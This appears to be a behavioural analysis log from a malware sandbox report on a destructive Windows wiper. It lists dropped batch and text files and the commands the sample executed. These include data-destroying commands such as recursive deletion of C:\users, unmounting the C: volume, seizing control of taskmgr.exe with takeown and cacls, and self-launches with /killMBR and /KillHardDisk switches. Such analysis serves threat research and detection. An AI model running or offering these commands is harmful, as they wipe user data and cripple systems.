Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im explorer.exe
- %WINDIR%\explorer.exe
- %TEMP%\mz_etilqs_0m6dj2hzlgvupzk
- <PATH_SAMPLE>1.exe
- <Current directory>\50936.bat
- <Current directory>\26452.txt
- <Current directory>\52820.bat
- <Current directory>\517200.txt
- <PATH_SAMPLE>2.exe
- <Current directory>\819026.txt
- <Current directory>\229784.bat
- <Current directory>\14220.bat
- <Current directory>\222953.txt
- <PATH_SAMPLE>8.exe
- %TEMP%\mz_etilqs_gbrt4h6qdi0z5jk
- <Current directory>\115446.bat
- <Current directory>\623244.txt
- <Current directory>\132161.txt
- <Current directory>\31984.bat
- <Current directory>\21204.bat
- <Current directory>\103840.bat
- <Current directory>\28470.bat
- <Current directory>\619814.txt
- <PATH_SAMPLE>6.exe
- <Current directory>\203481.bat
- <Current directory>\930563.txt
- <PATH_SAMPLE>9.exe
- <Current directory>\429588.txt
- <Current directory>\518246.txt
- <PATH_SAMPLE>4.exe
- <Current directory>\0.bat
- <Current directory>\0747.txt
- <PATH_SAMPLE>0.exe
- %TEMP%\mz_etilqs_gwqohbg644a2fhc
- <Current directory>\8415.bat
- <PATH_SAMPLE>5.exe
- <Current directory>\81829.txt
- ClassName: '' WindowName: ''
- '<PATH_SAMPLE>6.exe' 1684868778
- '<PATH_SAMPLE>0.exe' /killMBR 1684868778
- '<PATH_SAMPLE>9.exe' /autoup 1684868778
- '<PATH_SAMPLE>0.exe' /KillHardDisk 1684868778
- '<PATH_SAMPLE>9.exe' /protect 1684868778
- '<PATH_SAMPLE>4.exe' /autoup 1684868778
- '<PATH_SAMPLE>6.exe' /autoup 1684868778
- '<PATH_SAMPLE>9.exe' /killMBR 1684868778
- '<PATH_SAMPLE>4.exe' /protect 1684868778
- '<PATH_SAMPLE>6.exe' /protect 1684868778
- '<PATH_SAMPLE>0.exe' /killwindows 1684868778
- '<PATH_SAMPLE>4.exe' /killMBR 1684868778
- '<PATH_SAMPLE>9.exe' /KillHardDisk 1684868778
- '<PATH_SAMPLE>6.exe' /killMBR 1684868778
- '<PATH_SAMPLE>9.exe' /killwindows 1684868778
- '<PATH_SAMPLE>4.exe' /KillHardDisk 1684868778
- '<PATH_SAMPLE>6.exe' /KillHardDisk 1684868778
- '<PATH_SAMPLE>4.exe' /killwindows 1684868778
- '<PATH_SAMPLE>6.exe' /killwindows 1684868778
- '<PATH_SAMPLE>8.exe' 1684868778
- '<PATH_SAMPLE>2.exe' 1684868778
- '<PATH_SAMPLE>1.exe' 1684868778
- '<PATH_SAMPLE>5.exe' 1684868778
- '<PATH_SAMPLE>0.exe' 1684868778
- '<PATH_SAMPLE>4.exe' 1684868778
- '<PATH_SAMPLE>9.exe' 1684868778
- '<PATH_SAMPLE>0.exe' /protect 1684868778
- '<PATH_SAMPLE>0.exe' /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /protect 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe /KillHardDisk 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe /killwindows 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe /killMBR 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe /killMBR 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe /KillHardDisk 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe /killwindows 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe /protect 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe /protect 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe /killMBR 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe /KillHardDisk 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe /protect 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe /killMBR 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe /protect 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c takeown /f <SYSTEM32>\taskmgr.exe
- '<SYSTEM32>\cmd.exe' /c del C:\users /r /f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\taskmgr.exe
- '<SYSTEM32>\cmd.exe' /c mountvol c: /d
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+623244.txt <PATH_SAMPLE>6.exe
- '<SYSTEM32>\cmd.exe' /c Cacls <SYSTEM32>\taskmgr.exe /t /e /c /guser:F
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe /killwindows 1684868778
- '<SYSTEM32>\mountvol.exe' c: /d
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe /KillHardDisk 1684868778
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /autoup 1684868778
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /save 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+619814.txt <PATH_SAMPLE>6.exe
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+930563.txt <PATH_SAMPLE>9.exe
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>9.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+429588.txt <PATH_SAMPLE>4.exe
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+0747.txt <PATH_SAMPLE>0.exe
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>4.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>0.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im explorer.exe
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+518246.txt <PATH_SAMPLE>5.exe
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>5.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+132161.txt <PATH_SAMPLE>1.exe
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>1.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+26452.txt <PATH_SAMPLE>2.exe
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+517200.txt <PATH_SAMPLE>5.exe
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /killwindows 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>2.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+819026.txt <PATH_SAMPLE>8.exe
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /KillHardDisk 1684868778
- '<SYSTEM32>\cmd.exe' /c copy /b <Full path to file>+222953.txt <PATH_SAMPLE>2.exe
- '<SYSTEM32>\cmd.exe' /c start <Full path to file> /killMBR 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>8.exe 1684868778
- '<SYSTEM32>\cmd.exe' /c start <PATH_SAMPLE>6.exe /killwindows 1684868778
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\taskmgr.exe /t /e /c /guser:F